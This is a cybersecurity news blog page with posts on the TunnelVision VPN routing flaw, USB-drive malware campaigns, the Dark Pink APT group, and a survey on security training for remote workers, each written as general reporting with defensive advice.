Search This Blog

Powered by Blogger.

Blog Archive

Labels

Showing posts with label Cyber Attackers. Show all posts

Unpatchable VPN Vulnerability Exposes Data to Attackers: What You Need to Know

 

In a recent revelation that has sent shockwaves through the cybersecurity community, researchers have unearthed a significant vulnerability in virtual private networks (VPNs) dubbed TunnelVision. This flaw, described as deep and unpatchable, poses a substantial threat to data security, allowing malicious actors to intercept sensitive information without leaving a trace. The implications of this discovery are profound, shedding light on the inherent limitations of VPNs as a stand-alone security solution and underscoring the urgent need for a more robust and comprehensive approach to cybersecurity. 

By manipulating DHCP option 121, attackers can reroute data traffic within the encrypted VPN tunnel to a malicious gateway under their control. This interception occurs stealthily, without triggering any alarms or alerts, as the VPN software remains unaware that its contents have been rerouted. Consequently, organizations may remain oblivious to the breach until it's too late, allowing threat actors to siphon off data undetected. 

What makes TunnelVision particularly insidious is its ability to evade detection by traditional security measures. Unlike conventional attacks that leave behind telltale signs of intrusion, TunnelVision operates covertly within the encrypted VPN tunnel, making it virtually invisible to standard intrusion detection systems and VPN monitoring tools. As a result, organizations may be blindsided by the breach, unaware that their data is being compromised until it's too late to take action. 

The discovery of TunnelVision has profound implications for organizations that rely on VPNs to secure their networks and safeguard sensitive information. It exposes the inherent vulnerabilities of VPNs as a single point of failure in the security infrastructure, highlighting the need for a more holistic and layered approach to cybersecurity. Simply put, VPNs were never designed to serve as a comprehensive security solution; they are merely a means of establishing encrypted connections between remote users and corporate networks. 

To mitigate the risks posed by TunnelVision and similar vulnerabilities, organizations must adopt a multifaceted cybersecurity strategy that encompasses strong encryption, enhanced network monitoring, and a zero-trust security model. By encrypting data before it enters the VPN tunnel, organizations can ensure that even if intercepted, the data remains protected from prying eyes. Additionally, implementing rigorous network monitoring protocols can help detect and respond to anomalous behaviour indicative of a breach. 

Moreover, embracing a zero-trust security model, which assumes that no entity—whether inside or outside the network perimeter—is inherently trustworthy, can help organizations better defend against sophisticated attacks like TunnelVision. The discovery of TunnelVision serves as a wake-up call for organizations to reevaluate their cybersecurity posture and adopt a more proactive and comprehensive approach to threat mitigation. By addressing the underlying vulnerabilities in VPNs and implementing robust security measures, organizations can better protect their sensitive data and safeguard against emerging threats in an increasingly hostile digital landscape

Sharp Increase in Malware Attacks via USB Flash Drives

 

Instances of cybercriminals employing USB drives for malware attacks have seen a significant rise. According to security researchers from Mandiant, there has been a three-fold increase in malware attacks via USB drives aimed at stealing sensitive information during the first half of 2023. These researchers have disclosed details regarding two specific attack campaigns.

One of the attack campaigns, attributed to the China-linked cyberespionage group TEMP.Hex, targeted both public and private organizations in Europe, Asia, and the U.S. The attackers utilized USB flash drives to introduce the SOGU malware into compromised systems and extract valuable data. 

The flash drives contained multiple malicious software and employed a DLL hijacking technique to download the final payload into the memory of the compromised systems. Once executed, the SOGU malware carried out various actions such as capturing screenshots, recording keystrokes, establishing reverse shell connections, and enabling remote desktop connections for executing additional files. 

The stolen data was sent to the attackers' command and control (C2) server using a custom binary protocol over TCP, UDP, or ICMP. Industries targeted by this attack campaign included construction, engineering, government, manufacturing, retail, media, and pharmaceutical sectors.

In an attack campaign, victims were enticed to click on a file that appeared to be a legitimate executable file found in the root folder of a USB drive. Upon executing this file, an infection chain was triggered, leading to the download of a shellcode-based backdoor named SNOWYDRIVE.

The malware not only copied itself to removable drives connected to infected systems but also performed various other operations, such as writing or deleting files, initiating file uploads, and executing reverse shell commands.

Recently, the Check Point Research Team uncovered a new USB-based attack campaign attributed to a China-based group called Camaro Dragon. 

The campaign specifically targeted a healthcare institution in Europe and involved the deployment of several updated versions of malware toolsets, including WispRider and HopperTick. It was reported that Camaro Dragon effectively utilized USB drives to launch attacks in Myanmar, South Korea, Great Britain, India, and Russia.

Organizations are strongly advised to prioritize access restrictions on USB devices and conduct comprehensive scans for malicious files before connecting them to their networks. 

Additionally, it is crucial for organizations to enhance their awareness and understanding of such attack campaigns in order to proactively defend against threats from the outset. It can be achieved by implementing a robust and automated Threat Intelligence Platform (TIP) that provides real-time tactical and technical insights into attacks.

Government and Military Institutions Under Persistent Attacks by Dark Pink Hackers

 

In 2023, the Dark Pink APT cyber group has been spotted targeting government, military, and education organisations in Indonesia, Brunei, and Vietnam. The threat group has been active since at least mid-2021, primarily targeting companies in the Asia-Pacific region, but it was initially revealed by a Group-IB report in January 2023. 

After analyzing indicators of earlier activity by the threat actor, the researchers identified more breaches against an educational institute in Belgium and a military entity in Thailand. One of these PowerShell scripts is essential to Dark Pink's lateral movement approach, assisting in the identification and interaction with SMB shares on the network.

The script downloads a ZIP archive from GitHub, saves it to a local directory, and then creates LNK files on each SMB share that is linked to the malicious executable contained in the package. When these LNK files are opened, the malicious executable is launched, accelerating Dark Pink's spread across the network and extending its reach to new systems.

Dark Pink also employs PowerShell instructions to detect the existence of legitimate software and development tools on the infected device, which they can then exploit.

These tools include 'AccCheckConsole.exe,''remote.exe,' 'Extexport.exe,' 'MSPUB.exe,' and 'MSOHTMED.exe,' all of which can be used for proxy execution, downloading additional payloads, and other malicious activities.

However, Group-IB states that it has not seen any instances of these tools being abused in the detected assaults. As per  Group-IB, Dark Pink's data exfiltration mechanism has evolved beyond simply sending ZIP archives to Telegram conversations.

The attackers exploited DropBox uploads in some circumstances, while in others, they used HTTP exfiltration via a temporary endpoint built using the "Webhook.site" service or Windows servers.

The previously described scripts also have the ability to exfiltrate data by creating new WebClient objects and utilizing the PUT technique to transfer files to an external address after identifying the location of the target files on the compromised computer.

Group-IB assesses that the Dark Pink threat actors have not been deterred by their past exposure and are unlikely to change their ways now. The attackers will very certainly continue to improve their tools and diversify their approaches as much as possible.

One in Three Companies Holds off on Giving Cybersecurity Training to Remote Workers.

 


In a report from Hornetsecurity, the leading cybersecurity provider, it has been found that 33% of businesses do not provide cybersecurity awareness training to employees working remotely. 

According to the study, nearly three-quarters (74%) of remote staff have access to critical data, which means that upcoming hybrid workplaces will create a higher risk of security breaches and more risky behavior on the part of companies.  

Although there are several challenges currently, such as an insufficient number of training programs and employees feeling unprepared, almost half (44%) of respondents report that their organization intends to increase the number of employees working remotely in the coming months. 

Hornet Security's CEO, Daniel Hofmann, said that hybrid work has become more popular. Due to the associated risks that come with it, companies should place a high priority on training and educating employees to ensure that remote working is secure. He also added that it is imperative to note that traditional methods of controlling and securing company data do not work as effectively when employees work from off-site locations. Therefore, a large amount of responsibility falls on the individual. Companies must recognize the unique security risks associated with remote work. 

Additionally, companies should activate appropriate security management systems and empower their employees to deal with the level of risk associated with remote work.  

Threats and Challenges 

Based on an independent survey that surveyed 925 IT professionals and business owners from a range of business types and sizes around the world. In the survey, it was found that the vast majority of employees face cybersecurity risks as well as security management challenges while working remotely. 

According to research, two main problems pose risks to organizations. First, employees have access to critical data. However, they are not provided with sufficient training on how to manage cybersecurity activities or how to reduce the risk of a cyberattack or a breach. 

It is particularly pertinent for cybercriminals to take additional steps to improve remote working cybersecurity in the current climate. This is because they are becoming more sophisticated and using remote working as a weapon. Unsurprisingly, employees have seen a significant increase in smartphone attacks over the past few years. This is because hackers have learned that professional and personal data can likely be accessed as people can use their smartphones for work and often do. 

Concerns Regarding Remote Working Security  

It is a fact that companies have adapted to the latest methods of working. However, the cybersecurity risks associated with remote working have not been addressed. Providing basic training could make a significant difference in the way companies fight cybercrime. For instance, Hornet Security's Security Awareness Training can help corporations build their human firewalls. Managed endpoints are used for many purposes. To ensure that employees are protected from threats, it is essential to have powerful systems in place. Based on the results of the study, it was found that endpoint compromise (28%) and compromised credentials (28%) were the most common sources of cybersecurity incidents. A further 15% of employees said they used their own devices with some endpoint configurations for remote work in addition to their own devices. To have robust remote cybersecurity for organizations, it is clear that security awareness training, as well as the implementation of endpoint management systems, are necessary.